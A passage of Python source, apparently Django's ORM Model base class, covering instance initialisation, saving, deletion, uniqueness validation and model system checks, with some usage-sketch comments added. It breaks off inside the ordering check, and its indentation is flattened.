def __init__(self, *args, **kwargs):
# Alias some things as locals to avoid repeat global lookups
cls = self.__class__
opts = self._meta
_setattr = setattr
_DEFERRED = DEFERRED
pre_init.send(sender=cls, args=args, kwargs=kwargs)
# Set up the storage for instance state
self._state = ModelState()
# There is a rather weird disparity here; if kwargs, it's set, then args
# overrides it. It should be one or the other; don't duplicate the work
# The reason for the kwargs check is that standard iterator passes in by
# args, and instantiation for iteration is 33% faster.
if len(args) > len(opts.concrete_fields):
# Daft, but matches old exception sans the err msg.
raise IndexError("Number of args exceeds number of fields")
if not kwargs:
fields_iter = iter(opts.concrete_fields)
# The ordering of the zip calls matter - zip throws StopIteration
# when an iter throws it. So if the first iter throws it, the second
# is *not* consumed. We rely on this, so don't change the order
# without changing the logic.
for val, field in zip(args, fields_iter):
if val is _DEFERRED:
continue
_setattr(self, field.attname, val)
else:
# Slower, kwargs-ready version.
fields_iter = iter(opts.fields)
for val, field in zip(args, fields_iter):
if val is _DEFERRED:
continue
_setattr(self, field.attname, val)
kwargs.pop(field.name, None)
# Now we're left with the unprocessed fields that *must* come from
# keywords, or default.
for field in fields_iter:
is_related_object = False
# Virtual field
if field.attname not in kwargs and field.column is None:
continue
if kwargs:
if isinstance(field.remote_field, ForeignObjectRel):
try:
# Assume object instance was passed in.
rel_obj = kwargs.pop(field.name)
is_related_object = True
except KeyError:
try:
# Object instance wasn't passed in -- must be an ID.
val = kwargs.pop(field.attname)
except KeyError:
val = field.get_default()
else:
# Object instance was passed in. Special case: You can
# pass in "None" for related objects if it's allowed.
if rel_obj is None and field.null:
val = None
else:
try:
val = kwargs.pop(field.attname)
except KeyError:
# This is done with an exception rather than the
# default argument on pop because we don't want
# get_default() to be evaluated, and then not used.
# Refs #12057.
val = field.get_default()
else:
val = field.get_default()
if is_related_object:
# If we are passed a related instance, set it using the
# field.name instead of field.attname (e.g. "user" instead of
# "user_id") so that the object gets properly cached (and type
# checked) by the RelatedObjectDescriptor.
if rel_obj is not _DEFERRED:
_setattr(self, field.name, rel_obj)
else:
if val is not _DEFERRED:
_setattr(self, field.attname, val)
if kwargs:
property_names = opts._property_names
for prop in tuple(kwargs):
try:
# Any remaining kwargs must correspond to properties or
# virtual fields.
if prop in property_names or opts.get_field(prop):
if kwargs[prop] is not _DEFERRED:
_setattr(self, prop, kwargs[prop])
del kwargs[prop]
except (AttributeError, FieldDoesNotExist):
pass
if kwargs:
raise TypeError("'%s' is an invalid keyword argument for this function" % list(kwargs)[0])
super().__init__()
post_init.send(sender=cls, instance=self)
@classmethod
def from_db(cls, db, field_names, values):
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [values.pop() if f.attname in field_names else DEFERRED for f in cls._meta.concrete_fields]
new = cls(*values)
new._state.adding = False
new._state.db = db
return new
def __repr__(self):
try:
u = str(self)
except (UnicodeEncodeError, UnicodeDecodeError):
u = '[Bad Unicode data]'
return '<%s: %s>' % (self.__class__.__name__, u)
def __str__(self):
return '%s object' % self.__class__.__name__
def __eq__(self, other):
if not isinstance(other, Model):
return False
if self._meta.concrete_model != other._meta.concrete_model:
return False
my_pk = self._get_pk_val()
if my_pk is None:
return self is other
return my_pk == other._get_pk_val()
def __hash__(self):
if self._get_pk_val() is None:
raise TypeError("Model instances without primary key value are unhashable")
return hash(self._get_pk_val())
def __reduce__(self):
data = self.__dict__
data[DJANGO_VERSION_PICKLE_KEY] = get_version()
class_id = self._meta.app_label, self._meta.object_name
return model_unpickle, (class_id,), data
def __setstate__(self, state):
msg = None
pickled_version = state.get(DJANGO_VERSION_PICKLE_KEY)
if pickled_version:
current_version = get_version()
if current_version != pickled_version:
msg = (
"Pickled model instance's Django version %s does not match "
"the current version %s." % (pickled_version, current_version)
)
else:
msg = "Pickled model instance's Django version is not specified."
if msg:
warnings.warn(msg, RuntimeWarning, stacklevel=2)
self.__dict__.update(state)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
def _set_pk_val(self, value):
return setattr(self, self._meta.pk.attname, value)
pk = property(_get_pk_val, _set_pk_val)
def get_deferred_fields(self):
"""
Return a set containing names of deferred fields for this instance.
"""
return {
f.attname for f in self._meta.concrete_fields
if f.attname not in self.__dict__
}
def refresh_from_db(self, using=None, fields=None):
"""
Reload field values from the database.
By default, the reloading happens from the database this instance was
loaded from, or by the read router if this instance wasn't loaded from
any database. The using parameter will override the default.
Fields can be used to specify which fields to reload. The fields
should be an iterable of field attnames. If fields is None, then
all non-deferred fields are reloaded.
When accessing deferred fields of an instance, the deferred loading
of the field will call this method.
"""
if fields is not None:
if len(fields) == 0:
return
if any(LOOKUP_SEP in f for f in fields):
raise ValueError(
'Found "%s" in fields argument. Relations and transforms '
'are not allowed in fields.' % LOOKUP_SEP)
db = using if using is not None else self._state.db
db_instance_qs = self.__class__._default_manager.using(db).filter(pk=self.pk)
# Use provided fields, if not set then reload all non-deferred fields.
deferred_fields = self.get_deferred_fields()
if fields is not None:
fields = list(fields)
db_instance_qs = db_instance_qs.only(*fields)
elif deferred_fields:
fields = [f.attname for f in self._meta.concrete_fields
if f.attname not in deferred_fields]
db_instance_qs = db_instance_qs.only(*fields)
db_instance = db_instance_qs.get()
non_loaded_fields = db_instance.get_deferred_fields()
for field in self._meta.concrete_fields:
if field.attname in non_loaded_fields:
# This field wasn't refreshed - skip ahead.
continue
setattr(self, field.attname, getattr(db_instance, field.attname))
# Throw away stale foreign key references.
if field.is_relation and field.get_cache_name() in self.__dict__:
rel_instance = getattr(self, field.get_cache_name())
local_val = getattr(db_instance, field.attname)
related_val = None if rel_instance is None else getattr(rel_instance, field.target_field.attname)
if local_val != related_val or (local_val is None and related_val is None):
del self.__dict__[field.get_cache_name()]
self._state.db = db_instance._state.db
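    # Usage sketch (hypothetical ``Book`` model, shown as comments):
    #
    #   book = Book.objects.using('replica').get(pk=1)
    #   book.title = 'stale local edit'        # unsaved change
    #   book.refresh_from_db()                 # re-read all non-deferred fields
    #   book.refresh_from_db(fields=['title']) # or just the listed attnames
    #
    # Passing using='other' reloads from a different database; deferred fields
    # are loaded lazily through this same method when first accessed.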
def serializable_value(self, field_name):
"""
Return the value of the field name for this instance. If the field is
a foreign key, return the id value instead of the object. If there's
no Field object with this name on the model, return the model
attribute's value.
Used to serialize a field's value (in the serializer, or form output,
for example). Normally, you would just access the attribute directly
and not use this method.
"""
try:
field = self._meta.get_field(field_name)
except FieldDoesNotExist:
return getattr(self, field_name)
return getattr(self, field.attname)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
"""
Save the current instance. Override this in a subclass if you want to
control the saving process.
The 'force_insert' and 'force_update' parameters can be used to insist
that the "save" must be an SQL insert or update (or equivalent for
non-SQL backends), respectively. Normally, they should not be set.
"""
# Ensure that a model instance without a PK hasn't been assigned to
# a ForeignKey or OneToOneField on this model. If the field is
# nullable, allowing the save() would result in silent data loss.
for field in self._meta.concrete_fields:
if field.is_relation:
# If the related field isn't cached, then an instance hasn't
# been assigned and there's no need to worry about this check.
try:
getattr(self, field.get_cache_name())
except AttributeError:
continue
obj = getattr(self, field.name, None)
# A pk may have been assigned manually to a model instance not
# saved to the database (or auto-generated in a case like
# UUIDField), but we allow the save to proceed and rely on the
# database to raise an IntegrityError if applicable. If
# constraints aren't supported by the database, there's the
# unavoidable risk of data corruption.
if obj and obj.pk is None:
# Remove the object from a related instance cache.
if not field.remote_field.multiple:
delattr(obj, field.remote_field.get_cache_name())
raise ValueError(
"save() prohibited to prevent data loss due to "
"unsaved related object '%s'." % field.name
)
using = using or router.db_for_write(self.__class__, instance=self)
if force_insert and (force_update or update_fields):
raise ValueError("Cannot force both insert and updating in model saving.")
deferred_fields = self.get_deferred_fields()
if update_fields is not None:
# If update_fields is empty, skip the save. We do also check for
# no-op saves later on for inheritance cases. This bailout is
# still needed for skipping signal sending.
if len(update_fields) == 0:
return
update_fields = frozenset(update_fields)
field_names = set()
for field in self._meta.fields:
if not field.primary_key:
field_names.add(field.name)
if field.name != field.attname:
field_names.add(field.attname)
non_model_fields = update_fields.difference(field_names)
if non_model_fields:
raise ValueError("The following fields do not exist in this "
"model or are m2m fields: %s"
% ', '.join(non_model_fields))
# If saving to the same database, and this model is deferred, then
# automatically do a "update_fields" save on the loaded fields.
elif not force_insert and deferred_fields and using == self._state.db:
field_names = set()
for field in self._meta.concrete_fields:
if not field.primary_key and not hasattr(field, 'through'):
field_names.add(field.attname)
loaded_fields = field_names.difference(deferred_fields)
if loaded_fields:
update_fields = frozenset(loaded_fields)
self.save_base(using=using, force_insert=force_insert,
force_update=force_update, update_fields=update_fields)
save.alters_data = True
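    # Usage sketch (hypothetical ``Article`` model, shown as comments):
    #
    #   article = Article(title='draft')
    #   article.save()                          # INSERT (no pk assigned yet)
    #   article.title = 'final'
    #   article.save(update_fields=['title'])   # UPDATE limited to one column
    #   article.save(force_insert=True)         # insists on a fresh INSERT
    #
    # force_insert and force_update/update_fields cannot be combined, and an
    # empty update_fields sequence skips the save (and its signals) entirely.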
def save_base(self, raw=False, force_insert=False,
force_update=False, using=None, update_fields=None):
"""
Handle the parts of saving which should be done only once per save,
yet need to be done in raw saves, too. This includes some sanity
checks and signal sending.
The 'raw' argument is telling save_base not to save any parent
models and not to do any changes to the values before save. This
is used by fixture loading.
"""
using = using or router.db_for_write(self.__class__, instance=self)
assert not (force_insert and (force_update or update_fields))
assert update_fields is None or len(update_fields) > 0
cls = origin = self.__class__
# Skip proxies, but keep the origin as the proxy model.
if cls._meta.proxy:
cls = cls._meta.concrete_model
meta = cls._meta
if not meta.auto_created:
pre_save.send(
sender=origin, instance=self, raw=raw, using=using,
update_fields=update_fields,
)
with transaction.atomic(using=using, savepoint=False):
if not raw:
self._save_parents(cls, using, update_fields)
updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
# Store the database on which the object was saved
self._state.db = using
# Once saved, this is no longer a to-be-added instance.
self._state.adding = False
# Signal that the save is complete
if not meta.auto_created:
post_save.send(
sender=origin, instance=self, created=(not updated),
update_fields=update_fields, raw=raw, using=using,
)
save_base.alters_data = True
def _save_parents(self, cls, using, update_fields):
"""Save all the parents of cls using values from self."""
meta = cls._meta
for parent, field in meta.parents.items():
# Make sure the link fields are synced between parent and self.
if (field and getattr(self, parent._meta.pk.attname) is None and
getattr(self, field.attname) is not None):
setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
self._save_parents(cls=parent, using=using, update_fields=update_fields)
self._save_table(cls=parent, using=using, update_fields=update_fields)
# Set the parent's PK value to self.
if field:
setattr(self, field.attname, self._get_pk_val(parent._meta))
# Since we didn't have an instance of the parent handy set
# attname directly, bypassing the descriptor. Invalidate
# the related object cache, in case it's been accidentally
# populated. A fresh instance will be re-built from the
# database if necessary.
cache_name = field.get_cache_name()
if hasattr(self, cache_name):
delattr(self, cache_name)
def _save_table(self, raw=False, cls=None, force_insert=False,
force_update=False, using=None, update_fields=None):
"""
Do the heavy-lifting involved in saving. Update or insert the data
for a single table.
"""
meta = cls._meta
non_pks = [f for f in meta.local_concrete_fields if not f.primary_key]
if update_fields:
non_pks = [f for f in non_pks
if f.name in update_fields or f.attname in update_fields]
pk_val = self._get_pk_val(meta)
if pk_val is None:
pk_val = meta.pk.get_pk_value_on_save(self)
setattr(self, meta.pk.attname, pk_val)
pk_set = pk_val is not None
if not pk_set and (force_update or update_fields):
raise ValueError("Cannot force an update in save() with no primary key.")
updated = False
# If possible, try an UPDATE. If that doesn't update anything, do an INSERT.
if pk_set and not force_insert:
base_qs = cls._base_manager.using(using)
values = [(f, None, (getattr(self, f.attname) if raw else f.pre_save(self, False)))
for f in non_pks]
forced_update = update_fields or force_update
updated = self._do_update(base_qs, using, pk_val, values, update_fields,
forced_update)
if force_update and not updated:
raise DatabaseError("Forced update did not affect any rows.")
if update_fields and not updated:
raise DatabaseError("Save with update_fields did not affect any rows.")
if not updated:
if meta.order_with_respect_to:
# If this is a model with an order_with_respect_to
# autopopulate the _order field
field = meta.order_with_respect_to
filter_args = field.get_filter_kwargs_for_object(self)
order_value = cls._base_manager.using(using).filter(**filter_args).count()
self._order = order_value
fields = meta.local_concrete_fields
if not pk_set:
fields = [f for f in fields if f is not meta.auto_field]
update_pk = meta.auto_field and not pk_set
result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
if update_pk:
setattr(self, meta.pk.attname, result)
return updated
def _do_update(self, base_qs, using, pk_val, values, update_fields, forced_update):
"""
Try to update the model. Return True if the model was updated (if an
update query was done and a matching row was found in the DB).
"""
filtered = base_qs.filter(pk=pk_val)
if not values:
# We can end up here when saving a model in inheritance chain where
# update_fields doesn't target any field in current model. In that
# case we just say the update succeeded. Another case ending up here
# is a model with just PK - in that case check that the PK still
# exists.
return update_fields is not None or filtered.exists()
if self._meta.select_on_save and not forced_update:
if filtered.exists():
# It may happen that the object is deleted from the DB right after
# this check, causing the subsequent UPDATE to return zero matching
# rows. The same result can occur in some rare cases when the
# database returns zero despite the UPDATE being executed
# successfully (a row is matched and updated). In order to
# distinguish these two cases, the object's existence in the
# database is again checked for if the UPDATE query returns 0.
return filtered._update(values) > 0 or filtered.exists()
else:
return False
return filtered._update(values) > 0
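    # Note: the extra filtered.exists() round trip above is what
    # Meta.select_on_save opts into, e.g.
    #
    #   class LegacyRow(models.Model):
    #       class Meta:
    #           select_on_save = True   # SELECT before UPDATE on save()
    #
    # It costs one additional query but stays correct on databases that report
    # zero affected rows for UPDATEs that match but do not change anything.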
def _do_insert(self, manager, using, fields, update_pk, raw):
"""
Do an INSERT. If update_pk is defined then this method should return
the new pk for the model.
"""
return manager._insert([self], fields=fields, return_id=update_pk,
using=using, raw=raw)
def delete(self, using=None, keep_parents=False):
using = using or router.db_for_write(self.__class__, instance=self)
assert self._get_pk_val() is not None, (
"%s object can't be deleted because its %s attribute is set to None." %
(self._meta.object_name, self._meta.pk.attname)
)
collector = Collector(using=using)
collector.collect([self], keep_parents=keep_parents)
return collector.delete()
delete.alters_data = True
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_text(dict(field.flatchoices).get(value, value), strings_only=True)
def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
if not self.pk:
raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
op = 'gt' if is_next else 'lt'
order = '' if is_next else '-'
param = force_text(getattr(self, field.attname))
q = Q(**{'%s__%s' % (field.name, op): param})
q = q | Q(**{field.name: param, 'pk__%s' % op: self.pk})
qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by(
'%s%s' % (order, field.name), '%spk' % order
)
try:
return qs[0]
except IndexError:
raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
def _get_next_or_previous_in_order(self, is_next):
cachename = "__%s_order_cache" % is_next
if not hasattr(self, cachename):
op = 'gt' if is_next else 'lt'
order = '_order' if is_next else '-_order'
order_field = self._meta.order_with_respect_to
filter_args = order_field.get_filter_kwargs_for_object(self)
obj = self.__class__._default_manager.filter(**filter_args).filter(**{
'_order__%s' % op: self.__class__._default_manager.values('_order').filter(**{
self._meta.pk.name: self.pk
})
}).order_by(order)[:1].get()
setattr(self, cachename, obj)
return getattr(self, cachename)
def prepare_database_save(self, field):
if self.pk is None:
raise ValueError("Unsaved model instance %r cannot be used in an ORM query." % self)
return getattr(self, field.remote_field.get_related_field().attname)
def clean(self):
"""
Hook for doing any extra model-wide validation after clean() has been
called on every field by self.clean_fields. Any ValidationError raised
by this method will not be associated with a particular field; it will
have a special-case association with the field defined by NON_FIELD_ERRORS.
"""
pass
def validate_unique(self, exclude=None):
"""
Check unique constraints on the model and raise ValidationError if any
failed.
"""
unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
errors = self._perform_unique_checks(unique_checks)
date_errors = self._perform_date_checks(date_checks)
for k, v in date_errors.items():
errors.setdefault(k, []).extend(v)
if errors:
raise ValidationError(errors)
def _get_unique_checks(self, exclude=None):
"""
Return a list of checks to perform. Since validate_unique() could be
called from a ModelForm, some fields may have been excluded; we can't
perform a unique check on a model that is missing fields involved
in that check. Fields that did not validate should also be excluded,
but they need to be passed in via the exclude argument.
"""
if exclude is None:
exclude = []
unique_checks = []
unique_togethers = [(self.__class__, self._meta.unique_together)]
for parent_class in self._meta.get_parent_list():
if parent_class._meta.unique_together:
unique_togethers.append((parent_class, parent_class._meta.unique_together))
for model_class, unique_together in unique_togethers:
for check in unique_together:
for name in check:
# If this is an excluded field, don't add this check.
if name in exclude:
break
else:
unique_checks.append((model_class, tuple(check)))
# These are checks for the unique_for_<date/year/month>.
date_checks = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks.
fields_with_class = [(self.__class__, self._meta.local_fields)]
for parent_class in self._meta.get_parent_list():
fields_with_class.append((parent_class, parent_class._meta.local_fields))
for model_class, fields in fields_with_class:
for f in fields:
name = f.name
if name in exclude:
continue
if f.unique:
unique_checks.append((model_class, (name,)))
if f.unique_for_date and f.unique_for_date not in exclude:
date_checks.append((model_class, 'date', name, f.unique_for_date))
if f.unique_for_year and f.unique_for_year not in exclude:
date_checks.append((model_class, 'year', name, f.unique_for_year))
if f.unique_for_month and f.unique_for_month not in exclude:
date_checks.append((model_class, 'month', name, f.unique_for_month))
return unique_checks, date_checks
def _perform_unique_checks(self, unique_checks):
errors = {}
for model_class, unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
f = self._meta.get_field(field_name)
lookup_value = getattr(self, f.attname)
# TODO: Handle multiple backends with different feature flags.
if (lookup_value is None or
(lookup_value == '' and connection.features.interprets_empty_strings_as_nulls)):
# no value, skip the lookup
continue
if f.primary_key and not self._state.adding:
# no need to check for unique primary key when editing
continue
lookup_kwargs[str(field_name)] = lookup_value
# some fields were skipped, no reason to do the check
if len(unique_check) != len(lookup_kwargs):
continue
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
# Note that we need to use the pk as defined by model_class, not
# self.pk. These can be different fields because model inheritance
# allows single model to have effectively multiple primary keys.
# Refs #17615.
model_class_pk = self._get_pk_val(model_class._meta)
if not self._state.adding and model_class_pk is not None:
qs = qs.exclude(pk=model_class_pk)
if qs.exists():
if len(unique_check) == 1:
key = unique_check[0]
else:
key = NON_FIELD_ERRORS
errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
return errors
def _perform_date_checks(self, date_checks):
errors = {}
for model_class, lookup_type, field, unique_for in date_checks:
lookup_kwargs = {}
# there's a ticket to add a date lookup, we can remove this special
# case if that makes it's way in
date = getattr(self, unique_for)
if date is None:
continue
if lookup_type == 'date':
lookup_kwargs['%s__day' % unique_for] = date.day
lookup_kwargs['%s__month' % unique_for] = date.month
lookup_kwargs['%s__year' % unique_for] = date.year
else:
lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
lookup_kwargs[field] = getattr(self, field)
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
errors.setdefault(field, []).append(
self.date_error_message(lookup_type, field, unique_for)
)
return errors
def date_error_message(self, lookup_type, field_name, unique_for):
opts = self._meta
field = opts.get_field(field_name)
return ValidationError(
message=field.error_messages['unique_for_date'],
code='unique_for_date',
params={
'model': self,
'model_name': capfirst(opts.verbose_name),
'lookup_type': lookup_type,
'field': field_name,
'field_label': capfirst(field.verbose_name),
'date_field': unique_for,
'date_field_label': capfirst(opts.get_field(unique_for).verbose_name),
}
)
def unique_error_message(self, model_class, unique_check):
opts = model_class._meta
params = {
'model': self,
'model_class': model_class,
'model_name': capfirst(opts.verbose_name),
'unique_check': unique_check,
}
# A unique field
if len(unique_check) == 1:
field = opts.get_field(unique_check[0])
params['field_label'] = capfirst(field.verbose_name)
return ValidationError(
message=field.error_messages['unique'],
code='unique',
params=params,
)
# unique_together
else:
field_labels = [capfirst(opts.get_field(f).verbose_name) for f in unique_check]
params['field_labels'] = get_text_list(field_labels, _('and'))
return ValidationError(
message=_("%(model_name)s with this %(field_labels)s already exists."),
code='unique_together',
params=params,
)
def full_clean(self, exclude=None, validate_unique=True):
"""
Call clean_fields(), clean(), and validate_unique() on the model.
Raise a ValidationError for any errors that occur.
"""
errors = {}
if exclude is None:
exclude = []
else:
exclude = list(exclude)
try:
self.clean_fields(exclude=exclude)
except ValidationError as e:
errors = e.update_error_dict(errors)
# Form.clean() is run even if other validation fails, so do the
# same with Model.clean() for consistency.
try:
self.clean()
except ValidationError as e:
errors = e.update_error_dict(errors)
# Run unique checks, but only for fields that passed validation.
if validate_unique:
for name in errors.keys():
if name != NON_FIELD_ERRORS and name not in exclude:
exclude.append(name)
try:
self.validate_unique(exclude=exclude)
except ValidationError as e:
errors = e.update_error_dict(errors)
if errors:
raise ValidationError(errors)
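    # Usage sketch (hypothetical ``Ticket`` model, shown as comments):
    #
    #   ticket = Ticket(title='', priority=99)
    #   try:
    #       ticket.full_clean(exclude=['reporter'])
    #   except ValidationError as e:
    #       print(e.message_dict)   # e.g. {'title': [...], 'priority': [...]}
    #
    # clean_fields(), clean() and validate_unique() all run even when an
    # earlier step fails, and fields that already produced errors are excluded
    # from the unique checks, mirroring ModelForm validation.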
def clean_fields(self, exclude=None):
"""
Clean all fields and raise a ValidationError containing a dict
of all validation errors if any occur.
"""
if exclude is None:
exclude = []
errors = {}
for f in self._meta.fields:
if f.name in exclude:
continue
# Skip validation for empty fields with blank=True. The developer
# is responsible for making sure they have a valid value.
raw_value = getattr(self, f.attname)
if f.blank and raw_value in f.empty_values:
continue
try:
setattr(self, f.attname, f.clean(raw_value, self))
except ValidationError as e:
errors[f.name] = e.error_list
if errors:
raise ValidationError(errors)
@classmethod
def check(cls, **kwargs):
errors = []
errors.extend(cls._check_swappable())
errors.extend(cls._check_model())
errors.extend(cls._check_managers(**kwargs))
if not cls._meta.swapped:
errors.extend(cls._check_fields(**kwargs))
errors.extend(cls._check_m2m_through_same_relationship())
errors.extend(cls._check_long_column_names())
clash_errors = (
cls._check_id_field() +
cls._check_field_name_clashes() +
cls._check_model_name_db_lookup_clashes()
)
errors.extend(clash_errors)
# If there are field name clashes, hide consequent column name
# clashes.
if not clash_errors:
errors.extend(cls._check_column_name_clashes())
errors.extend(cls._check_index_together())
errors.extend(cls._check_unique_together())
errors.extend(cls._check_ordering())
return errors
@classmethod
def _check_swappable(cls):
"""Check if the swapped model exists."""
errors = []
if cls._meta.swapped:
try:
apps.get_model(cls._meta.swapped)
except ValueError:
errors.append(
checks.Error(
"'%s' is not of the form 'app_label.app_name'." % cls._meta.swappable,
id='models.E001',
)
)
except LookupError:
app_label, model_name = cls._meta.swapped.split('.')
errors.append(
checks.Error(
"'%s' references '%s.%s', which has not been "
"installed, or is abstract." % (
cls._meta.swappable, app_label, model_name
),
id='models.E002',
)
)
return errors
@classmethod
def _check_model(cls):
errors = []
if cls._meta.proxy:
if cls._meta.local_fields or cls._meta.local_many_to_many:
errors.append(
checks.Error(
"Proxy model '%s' contains model fields." % cls.__name__,
id='models.E017',
)
)
return errors
@classmethod
def _check_managers(cls, **kwargs):
"""Perform all manager checks."""
errors = []
for manager in cls._meta.managers:
errors.extend(manager.check(**kwargs))
return errors
@classmethod
def _check_fields(cls, **kwargs):
"""Perform all field checks."""
errors = []
for field in cls._meta.local_fields:
errors.extend(field.check(**kwargs))
for field in cls._meta.local_many_to_many:
errors.extend(field.check(from_model=cls, **kwargs))
return errors
@classmethod
def _check_m2m_through_same_relationship(cls):
""" Check if no relationship model is used by more than one m2m field.
"""
errors = []
seen_intermediary_signatures = []
fields = cls._meta.local_many_to_many
# Skip when the target model wasn't found.
fields = (f for f in fields if isinstance(f.remote_field.model, ModelBase))
# Skip when the relationship model wasn't found.
fields = (f for f in fields if isinstance(f.remote_field.through, ModelBase))
for f in fields:
signature = (f.remote_field.model, cls, f.remote_field.through)
if signature in seen_intermediary_signatures:
errors.append(
checks.Error(
"The model has two many-to-many relations through "
"the intermediate model '%s'." % f.remote_field.through._meta.label,
obj=cls,
id='models.E003',
)
)
else:
seen_intermediary_signatures.append(signature)
return errors
@classmethod
def _check_id_field(cls):
"""Check if `id` field is a primary key."""
fields = list(f for f in cls._meta.local_fields if f.name == 'id' and f != cls._meta.pk)
# fields is empty or consists of the invalid "id" field
if fields and not fields[0].primary_key and cls._meta.pk.name == 'id':
return [
checks.Error(
"'id' can only be used as a field name if the field also "
"sets 'primary_key=True'.",
obj=cls,
id='models.E004',
)
]
else:
return []
@classmethod
def _check_field_name_clashes(cls):
"""Forbid field shadowing in multi-table inheritance."""
errors = []
used_fields = {} # name or attname -> field
# Check that multi-inheritance doesn't cause field name shadowing.
for parent in cls._meta.get_parent_list():
for f in parent._meta.local_fields:
clash = used_fields.get(f.name) or used_fields.get(f.attname) or None
if clash:
errors.append(
checks.Error(
"The field '%s' from parent model "
"'%s' clashes with the field '%s' "
"from parent model '%s'." % (
clash.name, clash.model._meta,
f.name, f.model._meta
),
obj=cls,
id='models.E005',
)
)
used_fields[f.name] = f
used_fields[f.attname] = f
# Check that fields defined in the model don't clash with fields from
# parents, including auto-generated fields like multi-table inheritance
# child accessors.
for parent in cls._meta.get_parent_list():
for f in parent._meta.get_fields():
if f not in used_fields:
used_fields[f.name] = f
for f in cls._meta.local_fields:
clash = used_fields.get(f.name) or used_fields.get(f.attname) or None
# Note that we may detect clash between user-defined non-unique
# field "id" and automatically added unique field "id", both
# defined at the same model. This special case is considered in
# _check_id_field and here we ignore it.
id_conflict = f.name == "id" and clash and clash.name == "id" and clash.model == cls
if clash and not id_conflict:
errors.append(
checks.Error(
"The field '%s' clashes with the field '%s' "
"from model '%s'." % (
f.name, clash.name, clash.model._meta
),
obj=f,
id='models.E006',
)
)
used_fields[f.name] = f
used_fields[f.attname] = f
return errors
@classmethod
def _check_column_name_clashes(cls):
# Store a list of column names which have already been used by other fields.
used_column_names = []
errors = []
for f in cls._meta.local_fields:
_, column_name = f.get_attname_column()
# Ensure the column name is not already in use.
if column_name and column_name in used_column_names:
errors.append(
checks.Error(
"Field '%s' has column name '%s' that is used by "
"another field." % (f.name, column_name),
hint="Specify a 'db_column' for the field.",
obj=cls,
id='models.E007'
)
)
else:
used_column_names.append(column_name)
return errors
@classmethod
def _check_model_name_db_lookup_clashes(cls):
errors = []
model_name = cls.__name__
if model_name.startswith('_') or model_name.endswith('_'):
errors.append(
checks.Error(
"The model name '%s' cannot start or end with an underscore "
"as it collides with the query lookup syntax." % model_name,
obj=cls,
id='models.E023'
)
)
elif LOOKUP_SEP in model_name:
errors.append(
checks.Error(
"The model name '%s' cannot contain double underscores as "
"it collides with the query lookup syntax." % model_name,
obj=cls,
id='models.E024'
)
)
return errors
@classmethod
def _check_index_together(cls):
"""Check the value of "index_together" option."""
if not isinstance(cls._meta.index_together, (tuple, list)):
return [
checks.Error(
"'index_together' must be a list or tuple.",
obj=cls,
id='models.E008',
)
]
elif any(not isinstance(fields, (tuple, list)) for fields in cls._meta.index_together):
return [
checks.Error(
"All 'index_together' elements must be lists or tuples.",
obj=cls,
id='models.E009',
)
]
else:
errors = []
for fields in cls._meta.index_together:
errors.extend(cls._check_local_fields(fields, "index_together"))
return errors
@classmethod
def _check_unique_together(cls):
"""Check the value of "unique_together" option."""
if not isinstance(cls._meta.unique_together, (tuple, list)):
return [
checks.Error(
"'unique_together' must be a list or tuple.",
obj=cls,
id='models.E010',
)
]
elif any(not isinstance(fields, (tuple, list)) for fields in cls._meta.unique_together):
return [
checks.Error(
"All 'unique_together' elements must be lists or tuples.",
obj=cls,
id='models.E011',
)
]
else:
errors = []
for fields in cls._meta.unique_together:
errors.extend(cls._check_local_fields(fields, "unique_together"))
return errors
@classmethod
def _check_local_fields(cls, fields, option):
from django.db import models
# In order to avoid hitting the relation tree prematurely, we use our
# own fields_map instead of using get_field()
forward_fields_map = {
field.name: field for field in cls._meta._get_fields(reverse=False)
}
errors = []
for field_name in fields:
try:
field = forward_fields_map[field_name]
except KeyError:
errors.append(
checks.Error(
"'%s' refers to the nonexistent field '%s'." % (
option, field_name,
),
obj=cls,
id='models.E012',
)
)
else:
if isinstance(field.remote_field, models.ManyToManyRel):
errors.append(
checks.Error(
"'%s' refers to a ManyToManyField '%s', but "
"ManyToManyFields are not permitted in '%s'." % (
option, field_name, option,
),
obj=cls,
id='models.E013',
)
)
elif field not in cls._meta.local_fields:
errors.append(
checks.Error(
"'%s' refers to field '%s' which is not local to model '%s'."
% (option, field_name, cls._meta.object_name),
hint="This issue may be caused by multi-table inheritance.",
obj=cls,
id='models.E016',
)
)
return errors
@classmethod
def _check_ordering(cls):
"""
Check "ordering" option -- is it a list of strings and do all fields
exist?
"""
if cls._meta._ordering_clash:
return [
checks.Error(
"'ordering' and 'order_with_respect_to' cannot be used together.",
obj=cls,
id='models.E021',
),
]
if cls._meta.order_with_respect_to or not cls._meta.ordering:
return []
if not isinstance(cls._meta.ordering, (list, tuple)):
return [
checks.Error(
"'ordering' must be a tuple or list (even if you want to order by only one field).",
obj=cls,
id='models.E014',
)
]
errors = []
fields = cls._meta.ordering
# Skip '?' fields.
fields = (f for f in fields if f != '?')
# Convert "-field" to "field".
fields = ((f[1:] if f.startswith('-') else f) for f in fields)
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
fields = (f for f in fields if LOOKUP_SEP not in f)
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
fields = {f for f in fields if f != 'pk'}
# Check for invalid or nonexistent fields in ordering.
invalid_fields = []
# Any field name that is not present in field_names does not exist.
# Also, ordering by m2m fields is not allowed.
